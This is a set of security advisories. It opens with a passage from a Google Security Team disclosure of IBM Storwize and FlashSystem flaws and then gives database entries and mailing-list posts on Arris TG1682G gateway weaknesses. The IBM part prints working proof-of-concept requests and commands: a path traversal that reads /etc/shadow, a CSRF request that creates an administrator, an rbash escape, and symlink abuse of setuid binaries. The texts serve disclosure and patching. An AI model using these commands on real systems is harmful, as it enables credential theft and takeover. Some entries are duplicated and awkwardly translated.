Flashsystem 900 IBM Flashsystem 840 IBM Storwize V7000 Example request: GET /DownloadFile?filename=/etc/passwd HTTP/1.1 Host: v7k01n02 Connection: close Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 On the V7000 Unified the same request handler allows reading arbitrary files under the "root" user, however authentication is required here: GET /DownloadFile?filename=/etc/shadow Host: v7ku01 Connection: close Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: <redacted> ----------------------------------------------- CVE-2018-1434: Web interface vulnerable to CSRF ----------------------------------------------- The main web interface on the V7000 Unified is vulnerable to CSRF and other interfaces seem to be vulnerable as well. This could allow an external attacker to execute commands on behalf of a user/administrator of the system and potentially also access data stored on the system. Example request (using a cross domain XMLHttpRequest): POST /RPCAdapter HTTP/1.1 Host: v7ku01 Origin: https://www.example.com Referer: https://www.example.com/create_admin.html Content-Type: text/plain Connection: close Content-Length: 183 Cookie: <redacted> {"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"com.ibm.sonas.gui.logic.AccessRPC","methodName":"launchCreateUserTask","methodArgs":["my-secadmin","<redacted>",["Administrator"]]} Response: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Frame-Options: SAMEORIGIN Content-Type: application/json;charset=UTF-8 Content-Length: 319 Connection: close {"clazz":"com.ibm.evo.rpc.RPCResponse","messages":null,"result":{"clazz":"com.ibm.sonas.gui.logic.tasks.access.CreateUserTask","shouldBeScheduled":true,"started":1516202190188,"id":"<redacted>","name":"Create User", "state":"Running","status":"Task started.","progress":-1,"returnValue": null}} --------------------------------------------- CVE-2018-1462: Ineffective rBash Configuration --------------------------------------------- On machines with a restricted bash, a possible escape from rBash looks like the following: BASH_CMDS[escape]=/bin/bash;escape -------------------------------------------------- CVE-2018-1463: World readable credentials and encryption keys -------------------------------------------------- While some systems have removed the world-read bit from several files and directories, more important files which contain application configuration details, passwords and secret keys are world readable and sometimes also world writable. On the IBM Flash System, this also includes the storage encryption key. # Partial directory listing of /persist/ on the Unified system: drwxr-xr-x. 2 root root 4096 Jan 18 01:35 . drwxr-xr-x. 29 root root 4096 Aug 15 16:16 .. -rw-r--r--. 1 root root 27040 Jan 16 08:28 vpd ... # Partial directory listing of /mnt/plfs on the Flash system: drwxrwxrwx 4 root root 0 Dec 31 1969 . drwxr-x--x 7 root root 1024 Jan 8 07:41 .. -rw-rw-rw- 1 root root 24 Oct 24 2016 encryption.key ----------------------------------------------- CVE-2018-1464: Sensitive file disclosure of files readable by root ----------------------------------------------- The setuid binary svc_copy is a wrapper around the script sw_copy which calls cp on the shell. Creating a symlink to any file, this file can be copied as root to /dumps and is world readable/writable (-rw-rw-rw- ): $ ln -s /etc/shadow /tmp/shadow $ ./svc_copy /tmp/shadow /dumps/ The file /dumps/shadow is now world readable with the permissions (-rw-rw-rw- ) --------------------------------------------- CVE-2018-1495: Arbitrary file deletion --------------------------------------------- The setuid binary log_cleanup is a wrapper around log_cleanup.py This binary wipes the directories /dumps or /tmp and has an undocumented feature "-s" (delete target of symlink). The following command deletes an arbitrary file (e.g. /etc/shadow): $ ln -s /etc/shadow /tmp/shadow $ ./log_cleanup -s Select /tmp as target directory to be wiped -------------------------------------------------- CVE-2018-1467: Unauthenticated information disclosure -------------------------------------------------- Some web handlers on the V7000 Unified expose system configuration without authentication which could be used by an attacker to collect vital details about the environment. https://v7ku01/SonasInfoServlet?challenge=1 CLUSTER_ID=<redacted>;NAME=<redacted>.ibm;PROFILE=V7000 Unified;SYSTEM_NAME=<redacted>.ibm;mgmt001st001=<redacted>;mgmt002st001=<redacted>;idMapConfig=10000000-299999999,1000000;adHost<redacted>;krbMode=off;domain=<redacted>;idMapRole=master;realm=<redacted>;userName=<redacted>;idMappingMethod=auto;passwordServer=*;AUTH_TYPE=ad;IDMAP_10000000-10999999=ALLOC,ALLOC,auto;IDMAP_11000000-11999999=BUILTIN,S-1-5-32,auto;IDMAP_12000000-12999999=<redacted>,S-1-5-21-<redacted>,auto;IDMAP_13000000-13999999=<redacted>,S-1-5-21-<redacted>,auto; CHALLENGE <redacted> ----------------------------------------------- CVE-2018-1465: Unprivileged web server process may read SSL private key ----------------------------------------------- The current private key for the installed SSL certificate on the V7000 FC CE Cannister Node is readable by the webadmin user: -rw-r----- 1 webadmin 1000 1679 Aug 15 09:47 /dev/server.key As a result the file can be read through vulnerabilities in the web application, e.g. via the DownloadFile handler (see separate issue). Certificate details: Validity: 15 years Subject: C=GB, L=Hursley, O=IBM, OU=SSG, CN=2076, emailAddress=support@ibm.com --------------------------------------------- CVE-2018-1466: Weak password hashing algorithm used --------------------------------------------- The root password on the V7000 (CE) FC Cannister and Flash System nodes (and probably others, too) are hashed with a weak algorithm (DES) instead of the SHA512 which is the system's default according to /etc/login.defs. -------------------------------------------------- CVE-2018-1461: Missing Security Related HTTP Headers -------------------------------------------------- XSS Protection HTTP Header The XSS Filter is a feature that is built into modern web browsers and is meant to prevent reflective Cross Site Scripting attacks. This feature can be explicitly turned on (and also off) by using the HTTP header X-XSS-Protection. X-Content-Type Header To make MIME type confusion attacks harder, the HTTP header X-Content-Type-Options can be set. This header prevents trusting the user provided MIME type and instead guessing the MIME type of the server response. Author ====== The vulnerabilities were discovered by Sebastian Neuner (@sebastian9er) and Jan Bee from the Google Security Team. Timeline ======== 2018/01/26 - Security report sent to psirt@us.ibm.com with 90 day disclosure deadline (2018/04/26). 2018/01/29 - IBM acknowledges report and starts working on the issues. 2018/04/13 - IBM requested grace period due to internal patch cycle. 2018/04/16 - Google granted two week grace period (from 2018/04/26 to 2018/05/11). 2018/05/11 - Public disclosure on the Full Disclosure/Bugtraq Mailing List

On Arris Touchstone Telephony Gateway TG1682G 9.1.103J6 devices, a logout action does not immediately destroy all state on the device related to the validity of the "credential" cookie, which might make it easier for attackers to obtain access at a later time (e.g., "at least for a few minutes"). NOTE: there is no documentation stating that the web UI's logout feature was supposed to do anything beyond removing the cookie from one instance of a web browser; a client-side logout action is often not intended to address cases where a person has made a copy of a cookie outside of a browser. Arris TG1682G Contains a session expiration vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ArrisTouchstoneTelephonyGatewayTG1682G is a Modem (Modem) router integrated machine from Arris Group of the United States. A security vulnerability exists in the ArrisTouchstoneTelephonyGatewayTG1682G9.1.103J6 release that caused the logout operation to fail to immediately clear all states on the device. An attacker could exploit the vulnerability to gain access. Hi, Multiple vulnerabilities exist in Arris Touchstone Telephony Gateway (TG) Series devices, related to its web administration console. The CVEs for these devices have been created: CVE-2018-10989, CVE-2018-10990, CVE-2018-10991. A blog post containing the full disclosure has been created: https://medium.com/@AkshaySharmaUS/comcast-arris-touchstone-gateway-devices-are-vulnerable-heres-the-disclosure-7d603aa9342c Thank you. Regards Akshay 'Ax' Sharma

Arris Touchstone Telephony Gateway TG1682G 9.1.103J6 devices are distributed by some ISPs with a default password of "password" for the admin account that is used over an unencrypted http://192.168.0.1 connection, which might allow remote attackers to bypass intended access restrictions by leveraging access to the local network. NOTE: one or more user's guides distributed by ISPs state "At a minimum, you should set a login password.". Arris TG1682G Contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ArrisTouchstoneTelephonyGatewayTG1682G is a Modem (Modem) router integrated machine from Arris Group of the United States. A security vulnerability exists in ArrisTouchstoneTelephonyGatewayTG1682G9.1.103J6, which is derived from the default password used by the admin account: password. There is a security vulnerability in Arris Touchstone Telephony Gateway TG1682G version 9.1.103J6. Hi, Multiple vulnerabilities exist in Arris Touchstone Telephony Gateway (TG) Series devices, related to its web administration console. The CVEs for these devices have been created: CVE-2018-10989, CVE-2018-10990, CVE-2018-10991. A blog post containing the full disclosure has been created: https://medium.com/@AkshaySharmaUS/comcast-arris-touchstone-gateway-devices-are-vulnerable-heres-the-disclosure-7d603aa9342c Thank you. Regards Akshay 'Ax' Sharma